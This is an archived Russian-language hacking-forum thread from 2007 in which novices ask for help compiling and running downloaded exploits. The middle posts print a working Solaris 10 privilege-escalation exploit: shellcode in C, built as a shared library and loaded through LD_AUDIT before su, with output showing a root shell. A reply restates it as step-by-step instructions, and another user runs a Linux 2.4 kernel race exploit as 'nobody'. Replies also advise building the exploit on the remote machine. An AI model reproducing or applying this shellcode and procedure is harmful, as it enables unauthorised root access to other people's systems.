ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

25.02.2007, 21:08
|
|
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме: 626169
Репутация:
167
|
|
Эм... наверное "сильно" тупой вопрос- Как убрать защиту от таких как я(скрипткидис вроде зовется =)), а то на С скачал сплоит... а он не компилируется(это вроде бы так называется =)) =/
Учить Си. В каждом сплойте разные ошибки, где-то кавычка в другую сторону, где буква в операторе пропущена. А вообще, пробуй компилировать, смотри, на какие строки ругается компилятор, бери справочник и сверяй.
|
|
|

26.02.2007, 18:48
|
|
Новичок
Регистрация: 20.11.2006
Сообщений: 19
Провел на форуме: 159979
Репутация:
1
|
|
Ок... спасибо =)
|
|
|

26.02.2007, 20:27
|
|
Постоянный
Регистрация: 11.10.2006
Сообщений: 659
Провел на форуме: 1594033
Репутация:
216
|
|
Учить Си. В каждом сплойте разные ошибки, где-то кавычка в другую сторону, где буква в операторе пропущена. А вообще, пробуй компилировать, смотри, на какие строки ругается компилятор, бери справочник и сверяй.
после такой компиляции со справочником этот сплойт привратитса во что угодно вплоть до эмулятора os/2 но только не експлойт =))) а вот учи С это на самом деле полезный совет .
Последний раз редактировалось ground_zero; 26.02.2007 в 20:30..
|
|
|

08.03.2007, 04:52
|
|
Новичок
Регистрация: 25.02.2007
Сообщений: 8
Провел на форуме: 30402
Репутация:
2
|
|
Подскажите плз.
Нашел сплоит для SunOS 5.10, не понимаю как пользаваться. Эт тип PoC код какой-то.
atari:venglin:~> cat dupa.c
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\
x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x
01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe
8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68
\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\
x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x
04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xf
f";
int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
atari:venglin:~> gcc -fPIC -shared -o /tmp/dupa.so dupa.c
atari:venglin:~> setenv LD_AUDIT /tmp/dupa.so
atari:venglin:~> su
# id
uid=0(root) gid=10(staff)
|
|
|

08.03.2007, 05:40
|
|
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме: 626169
Репутация:
167
|
|
Создаешь файл dupa.c со следующим содержанием:
Код:
static char sh[] =
"\x31\xc0\xeb\x09\x5a\x89\x42\x01\x88\
x42\x06\xeb\x0d\xe8\xf2\xff\xff\xff\x9a\x
01\x01\x01\x01\x07\x01\xc3\x50\xb0\x17\xe
8\xf0\xff\xff\xff\x31\xc0\x68\x2f\x73\x68
\x5f\x68\x2f\x62\x69\x6e\x88\x44\x24\x07\
x89\xe3\x50\x53\x8d\x0c\x24\x8d\x54\x24\x
04\x52\x51\x53\xb0\x0b\xe8\xcb\xff\xff\xf
f";
int la_version() {
void (*f)();
f = (void*)sh;
f();
return 3;
}
Компилируешь:
gcc -fPIC -shared -o /tmp/dupa.so dupa.c
Собираешь:
setenv LD_AUDIT /tmp/dupa.so
|
|
|

10.03.2007, 19:07
|
|
Новичок
Регистрация: 25.02.2007
Сообщений: 8
Провел на форуме: 30402
Репутация:
2
|
|
А его обязательно компилить и собирать на удаленой машине или откомпилировать можно у себя?
|
|
|

11.03.2007, 01:03
|
|
Участник форума
Регистрация: 11.09.2006
Сообщений: 239
Провел на форуме: 626169
Репутация:
167
|
|
Bac9l
Желательно на удаленной, хотя в некоторых случаях возможно и на локальной (зависит от сплойта).
|
|
|

12.03.2007, 18:36
|
|
Участник форума
Регистрация: 27.01.2007
Сообщений: 118
Провел на форуме: 333575
Репутация:
44
|
|
1. Linux 2.4.25 SMP
2. Права nobody.
Судя по всему, может порутать только uslibpr.c.
Собрал, запускаю:
./libr -d 0
[+] SLAB cleanup
child 1 VMAs 124
[+] moved stack bfffe000, task_size=0xc0000000, map_base=0xbf800000
[+] vmalloc area 0xe7800000 - 0xffffd000
Wait... -
[+] race won maps=211
И так и висит. Вопрос - это нормально, или сплойт повис?  ))
P.S. Без параметра -d 0 выплевывает ошибку после Wait.
|
|
|

12.03.2007, 18:44
|
|
Постоянный
Регистрация: 11.10.2006
Сообщений: 659
Провел на форуме: 1594033
Репутация:
216
|
|
выплевывает ошибку после Wait.
значит время для ожидания выполнения закончено нет конекта с сервером или код в установленный промежуток выполнить не удалось .
|
|
|

12.03.2007, 18:50
|
|
Участник форума
Регистрация: 27.01.2007
Сообщений: 118
Провел на форуме: 333575
Репутация:
44
|
|
ground_zero, это во втором случае, если без -d 0. А что с первым?
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|